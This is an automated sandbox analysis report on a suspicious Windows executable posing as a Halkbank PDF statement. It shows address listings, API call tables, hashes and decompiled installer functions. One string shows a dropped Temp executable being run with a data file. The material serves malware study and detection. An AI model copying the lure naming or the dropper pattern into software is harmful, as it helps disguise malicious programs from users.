                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004053be
                                          0x004053be
                                          0x004053c5
                                          0x00405436
                                          0x0040543e
                                          0x00405446
                                          0x00405446
                                          0x0040544f
                                          0x00405451
                                          0x00405458
                                          0x0040545b
                                          0x0040545b
                                          0x00405461
                                          0x00405468
                                          0x0040546b
                                          0x0040546b
                                          0x00405471
                                          0x00405477
                                          0x0040547d
                                          0x0040547d
                                          0x0040548a
                                          0x004055eb
                                          0x004055f2
                                          0x0040560f
                                          0x00405615
                                          0x00405627
                                          0x00405627
                                          0x00000000
                                          0x00405490
                                          0x00405492
                                          0x00405497
                                          0x0040549c
                                          0x004054a1
                                          0x004054a3
                                          0x004054a3
                                          0x004054a4
                                          0x004054a5
                                          0x004054a7
                                          0x004054a7
                                          0x004054af
                                          0x004054f0
                                          0x004054f2
                                          0x00405502
                                          0x00405505
                                          0x0040550a
                                          0x00405511
                                          0x00405514
                                          0x004055b6
                                          0x004055bf
                                          0x004055c7
                                          0x004055c7
                                          0x004055d5
                                          0x004055e6
                                          0x004055e6
                                          0x00000000
                                          0x004055d5
                                          0x0040551a
                                          0x0040551d
                                          0x00405523
                                          0x00405528
                                          0x0040552a
                                          0x0040552c
                                          0x00405532
                                          0x00405539
                                          0x0040553e
                                          0x00405545
                                          0x00405548
                                          0x00405548
                                          0x0040554f
                                          0x0040555b
                                          0x0040555f
                                          0x00405561
                                          0x00405561
                                          0x00405551
                                          0x00405553
                                          0x00405553
                                          0x00405581
                                          0x0040558d
                                          0x0040559c
                                          0x0040559c
                                          0x0040559e
                                          0x004055a1
                                          0x004055aa
                                          0x00000000
                                          0x004054b1
                                          0x004054bc
                                          0x004054bf
                                          0x004054c4
                                          0x004054c6
                                          0x004054ca
                                          0x004054da
                                          0x004054e4
                                          0x004054e6
                                          0x004054e9
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x004054cc
                                          0x004054cc
                                          0x004054d2
                                          0x004054d4
                                          0x004054d4
                                          0x004054d5
                                          0x004054d6
                                          0x00000000
                                          0x004054cc
                                          0x004054af
                                          0x0040548a
                                          0x004053cd
                                          0x00000000
                                          0x004053e3
                                          0x004053ed
                                          0x004053f2
                                          0x00000000
                                          0x00000000
                                          0x00405404
                                          0x00405409
                                          0x00405415
                                          0x00405415
                                          0x00405417
                                          0x00405426
                                          0x00405428
                                          0x0040542c
                                          0x0040542f
                                          0x00000000
                                          0x0040542f
                                          0x004053cd
                                          0x00405083
                                          0x00405088
                                          0x00405091
                                          0x00405098
                                          0x004050aa
                                          0x004050b5
                                          0x004050bb
                                          0x004050c9
                                          0x004050dd
                                          0x004050e2
                                          0x004050ef
                                          0x004050f4
                                          0x0040510a
                                          0x0040511b
                                          0x00405128
                                          0x00405128
                                          0x0040512b
                                          0x00405131
                                          0x00405133
                                          0x00405136
                                          0x0040513b
                                          0x00405140
                                          0x00405142
                                          0x00405142
                                          0x00405162
                                          0x00405162
                                          0x00405164
                                          0x00405165
                                          0x0040516a
                                          0x00405170
                                          0x00405174
                                          0x00405179
                                          0x00405181
                                          0x00405185
                                          0x0040518a
                                          0x0040518f
                                          0x00405197
                                          0x0040519a
                                          0x0040526a
                                          0x0040527d
                                          0x00000000
                                          0x004051a0
                                          0x004051a3
                                          0x004051a6
                                          0x004051a9
                                          0x004051a9
                                          0x004051af
                                          0x004051b8
                                          0x004051bb
                                          0x004051bf
                                          0x004051c2
                                          0x004051c5
                                          0x004051ce
                                          0x004051d7
                                          0x004051da
                                          0x004051dd
                                          0x004051e0
                                          0x0040521e
                                          0x00405249
                                          0x00405220
                                          0x0040522f
                                          0x0040522f
                                          0x004051e2
                                          0x004051e5
                                          0x004051f3
                                          0x004051fd
                                          0x00405205
                                          0x0040520c
                                          0x00405217
                                          0x00405217
                                          0x004051e0
                                          0x0040524f
                                          0x00405250
                                          0x0040525c
                                          0x0040525c
                                          0x00405268
                                          0x00405283
                                          0x00405286
                                          0x004052a3
                                          0x00000000
                                          0x00405288
                                          0x0040528d
                                          0x00405296
                                          0x00405629
                                          0x0040563b
                                          0x0040563b
                                          0x00405286
                                          0x00000000
                                          0x00405268
                                          0x0040519a

                                          APIs
                                          • GetDlgItem.USER32 ref: 00405049
                                          • GetDlgItem.USER32 ref: 00405054
                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 0040509E
                                          • LoadImageW.USER32 ref: 004050B5
                                          • SetWindowLongW.USER32 ref: 004050CE
                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E2
                                          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050F4
                                          • SendMessageW.USER32(?,00001109,00000002), ref: 0040510A
                                          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405116
                                          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405128
                                          • DeleteObject.GDI32(00000000), ref: 0040512B
                                          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405156
                                          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405162
                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 004051FD
                                          • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040522D
                                            • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405241
                                          • GetWindowLongW.USER32(?,000000F0), ref: 0040526F
                                          • SetWindowLongW.USER32 ref: 0040527D
                                          • ShowWindow.USER32(?,00000005), ref: 0040528D
                                          • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405388
                                          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053ED
                                          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405402
                                          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405426
                                          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405446
                                          • ImageList_Destroy.COMCTL32(?), ref: 0040545B
                                          • GlobalFree.KERNEL32 ref: 0040546B
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054E4
                                          • SendMessageW.USER32(?,00001102,?,?), ref: 0040558D
                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040559C
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 004055C7
                                          • ShowWindow.USER32(?,00000000), ref: 00405615
                                          • GetDlgItem.USER32 ref: 00405620
                                          • ShowWindow.USER32(00000000), ref: 00405627
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                          • String ID: $M$N
                                          • API String ID: 2564846305-813528018
                                          • Opcode ID: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                          • Instruction ID: a1eb65f7683e17450fca8d4cb4c1055b074660be5b1b810df034ff690b7f681c
                                          • Opcode Fuzzy Hash: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                          • Instruction Fuzzy Hash: 2A025CB0900609EFDF20DF65CD45AAE7BB5FB44315F10817AEA10BA2E1D7798A52CF18
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404783 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 91%
                                          			E00404783(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x421714 =  *0x421714 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E0040462B(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x428200;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E00404A32(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x42a268, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x42a268, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x421714 != 0) {
						goto L27;
					} else {
						_t116 =  *0x422720 + 0x14;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004045E6(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404A0E();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x42923c - 4 + _t75 * 4);
				}
				_t76 =  *0x42a298 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E00404734;
				if(_t110 != 2) {
					_v8 = E004046FA;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E004045C4(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E004045C4(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004045E6( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E004045F9(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x42a270 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x421714 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x421714 = 0;
				return 0;
			}


















                                          0x00404795
                                          0x004048c2
                                          0x0040491f
                                          0x00404923
                                          0x004049f0
                                          0x004049f2
                                          0x004049f2
                                          0x004049f8
                                          0x004049f8
                                          0x004049fb
                                          0x00000000
                                          0x00404a02
                                          0x00404931
                                          0x00404937
                                          0x00404941
                                          0x0040494c
                                          0x0040494f
                                          0x00404952
                                          0x0040495d
                                          0x00404960
                                          0x00404967
                                          0x00404974
                                          0x00404985
                                          0x0040498b
                                          0x00404993
                                          0x004049a1
                                          0x004049a7
                                          0x004049a7
                                          0x00404967
                                          0x004049b1
                                          0x00000000
                                          0x004049bc
                                          0x004049c0
                                          0x004049d0
                                          0x004049d0
                                          0x004049d6
                                          0x004049e2
                                          0x004049e2
                                          0x00000000
                                          0x004049e6
                                          0x004049b1
                                          0x004048cd
                                          0x00000000
                                          0x004048df
                                          0x004048e4
                                          0x004048ea
                                          0x00000000
                                          0x00000000
                                          0x00404913
                                          0x00404915
                                          0x0040491a
                                          0x00000000
                                          0x0040491a
                                          0x004048cd
                                          0x0040479b
                                          0x0040479e
                                          0x004047a3
                                          0x004047b4
                                          0x004047b4
                                          0x004047bc
                                          0x004047bf
                                          0x004047c3
                                          0x004047c6
                                          0x004047ca
                                          0x004047cd
                                          0x004047d0
                                          0x004047d3
                                          0x004047da
                                          0x004047dc
                                          0x004047dc
                                          0x004047e6
                                          0x004047f3
                                          0x004047fd
                                          0x00404802
                                          0x00404805
                                          0x0040480a
                                          0x00404821
                                          0x00404828
                                          0x0040483b
                                          0x0040483e
                                          0x00404852
                                          0x00404859
                                          0x0040485e
                                          0x00404863
                                          0x00404863
                                          0x00404871
                                          0x0040487f
                                          0x00404891
                                          0x00404896
                                          0x004048a6
                                          0x004048a8
                                          0x00000000

                                          APIs
                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404821
                                          • GetDlgItem.USER32 ref: 00404835
                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404852
                                          • GetSysColor.USER32(?), ref: 00404863
                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404871
                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040487F
                                          • lstrlenW.KERNEL32(?), ref: 00404884
                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404891
                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048A6
                                          • GetDlgItem.USER32 ref: 004048FF
                                          • SendMessageW.USER32(00000000), ref: 00404906
                                          • GetDlgItem.USER32 ref: 00404931
                                          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404974
                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00404982
                                          • SetCursor.USER32(00000000), ref: 00404985
                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0040499E
                                          • SetCursor.USER32(00000000), ref: 004049A1
                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D0
                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E2
                                          Strings
                                          • N, xrefs: 0040491F
                                          • "C:\Users\user\AppData\Local\Temp\dlcmto.exe" C:\Users\user\AppData\Local\Temp\osqafruepl.xf, xrefs: 00404960
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                          • String ID: "C:\Users\user\AppData\Local\Temp\dlcmto.exe" C:\Users\user\AppData\Local\Temp\osqafruepl.xf$N
                                          • API String ID: 3103080414-164618301
                                          • Opcode ID: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                          • Instruction ID: 690b4d321b533a2a97605fa3f7bb2423a24794fe1ec6c961d913f822d5f12d1b
                                          • Opcode Fuzzy Hash: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                          • Instruction Fuzzy Hash: AB6181F1900209FFDB109F61CD85A6A7B69FB84304F00813AF705B62E0C7799951DFA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004062AE Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130memorystringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E004062AE(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t12;
				long _t24;
				char* _t31;
				int _t37;
				void* _t38;
				intOrPtr* _t39;
				long _t42;
				WCHAR* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t52;
				void* _t53;

				_t38 = __ecx;
				_t44 =  *(_t52 + 0x14);
				 *0x426de8 = 0x55004e;
				 *0x426dec = 0x4c;
				if(_t44 == 0) {
					L3:
					_t2 = _t52 + 0x1c; // 0x4275e8
					_t12 = GetShortPathNameW( *_t2, 0x4275e8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						_t37 = wsprintfA(0x4269e8, "%ls=%ls\r\n", 0x426de8, 0x4275e8);
						_t53 = _t52 + 0x10;
						E004066A5(_t37, 0x400, 0x4275e8, 0x4275e8,  *((intOrPtr*)( *0x42a270 + 0x128)));
						_t12 = E00406158(0x4275e8, 0xc0000000, 4);
						_t48 = _t12;
						 *(_t53 + 0x18) = _t48;
						if(_t48 != 0xffffffff) {
							_t42 = GetFileSize(_t48, 0);
							_t6 = _t37 + 0xa; // 0xa
							_t46 = GlobalAlloc(0x40, _t42 + _t6);
							if(_t46 == 0 || E004061DB(_t48, _t46, _t42) == 0) {
								L18:
								return CloseHandle(_t48);
							} else {
								if(E004060BD(_t38, _t46, "[Rename]\r\n") != 0) {
									_t49 = E004060BD(_t38, _t21 + 0xa, "\n[");
									if(_t49 == 0) {
										_t48 =  *(_t53 + 0x18);
										L16:
										_t24 = _t42;
										L17:
										E00406113(_t24 + _t46, 0x4269e8, _t37);
										SetFilePointer(_t48, 0, 0, 0);
										E0040620A(_t48, _t46, _t42 + _t37);
										GlobalFree(_t46);
										goto L18;
									}
									_t39 = _t46 + _t42;
									_t31 = _t39 + _t37;
									while(_t39 > _t49) {
										 *_t31 =  *_t39;
										_t31 = _t31 - 1;
										_t39 = _t39 - 1;
									}
									_t24 = _t49 - _t46 + 1;
									_t48 =  *(_t53 + 0x18);
									goto L17;
								}
								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
								_t42 = _t42 + 0xa;
								goto L16;
							}
						}
					}
				} else {
					CloseHandle(E00406158(_t44, 0, 1));
					_t12 = GetShortPathNameW(_t44, 0x426de8, 0x400);
					if(_t12 != 0 && _t12 <= 0x400) {
						goto L3;
					}
				}
				return _t12;
			}



















                                          0x004062ae
                                          0x004062b7
                                          0x004062be
                                          0x004062c8
                                          0x004062dc
                                          0x00406304
                                          0x0040630b
                                          0x0040630f
                                          0x00406313
                                          0x00406333
                                          0x0040633a
                                          0x00406344
                                          0x00406351
                                          0x00406356
                                          0x0040635b
                                          0x0040635f
                                          0x0040636e
                                          0x00406370
                                          0x0040637d
                                          0x00406381
                                          0x0040641c
                                          0x00000000
                                          0x00406397
                                          0x004063a4
                                          0x004063c8
                                          0x004063cc
                                          0x004063eb
                                          0x004063ef
                                          0x004063ef
                                          0x004063f1
                                          0x004063fa
                                          0x00406405
                                          0x00406410
                                          0x00406416
                                          0x00000000
                                          0x00406416
                                          0x004063ce
                                          0x004063d1
                                          0x004063dc
                                          0x004063d8
                                          0x004063da
                                          0x004063db
                                          0x004063db
                                          0x004063e3
                                          0x004063e5
                                          0x00000000
                                          0x004063e5
                                          0x004063af
                                          0x004063b5
                                          0x00000000
                                          0x004063b5
                                          0x00406381
                                          0x0040635f
                                          0x004062de
                                          0x004062e9
                                          0x004062f2
                                          0x004062f6
                                          0x00000000
                                          0x00000000
                                          0x004062f6
                                          0x00406427

                                          APIs
                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406449,?,?), ref: 004062E9
                                          • GetShortPathNameW.KERNEL32 ref: 004062F2
                                            • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                            • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                          • GetShortPathNameW.KERNEL32 ref: 0040630F
                                          • wsprintfA.USER32 ref: 0040632D
                                          • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406368
                                          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406377
                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063AF
                                          • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406405
                                          • GlobalFree.KERNEL32 ref: 00406416
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040641D
                                            • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\Halkbank_Ekstre_20191102_073809_405251-PDF.com.exe,80000000,00000003), ref: 0040615C
                                            • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                          • String ID: %ls=%ls$[Rename]$mB$uB$uB
                                          • API String ID: 2171350718-2295842750
                                          • Opcode ID: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                          • Instruction ID: df9b4e9fb9d32bd4c250032a1d399944af7a2e4c2f0bdec2b7d3959d12e60cc8
                                          • Opcode Fuzzy Hash: 1440962ef2f3b8112e1664fd7ccaf364af2d80964e03d16af1fd95ff0e1f48f4
                                          • Instruction Fuzzy Hash: B8314331200315BBD2206B619D49F5B3AACEF85704F16003BFD02FA2C2EA7DD82186BD
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 90%
                                          			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x42a270;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextW(_t128, 0x429260, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x42a268;
				}
				return DefWindowProcW(_a4, _a8, _a12, _t102);
			}













                                          0x0040100a
                                          0x00401039
                                          0x00401047
                                          0x0040104d
                                          0x00401051
                                          0x0040105b
                                          0x00401061
                                          0x00401064
                                          0x004010f3
                                          0x00401089
                                          0x0040108c
                                          0x004010a6
                                          0x004010bd
                                          0x004010cc
                                          0x004010cf
                                          0x004010d5
                                          0x004010d9
                                          0x004010e4
                                          0x004010ed
                                          0x004010ef
                                          0x004010ef
                                          0x00401100
                                          0x00401105
                                          0x0040110d
                                          0x00401110
                                          0x00401112
                                          0x00401118
                                          0x0040111f
                                          0x00401126
                                          0x00401130
                                          0x00401142
                                          0x00401156
                                          0x00401160
                                          0x00401165
                                          0x00401165
                                          0x00401110
                                          0x0040116e
                                          0x00000000
                                          0x00401178
                                          0x00401010
                                          0x00401013
                                          0x00401015
                                          0x0040101f
                                          0x0040101f
                                          0x00000000

                                          APIs
                                          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                          • BeginPaint.USER32(?,?), ref: 00401047
                                          • GetClientRect.USER32 ref: 0040105B
                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                          • FillRect.USER32 ref: 004010E4
                                          • DeleteObject.GDI32(?), ref: 004010ED
                                          • CreateFontIndirectW.GDI32(?), ref: 00401105
                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                          • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                          • DeleteObject.GDI32(?), ref: 00401165
                                          • EndPaint.USER32(?,?), ref: 0040116E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.259056765.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.259049654.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259066123.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259072728.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.259109034.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                          Similarity
                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
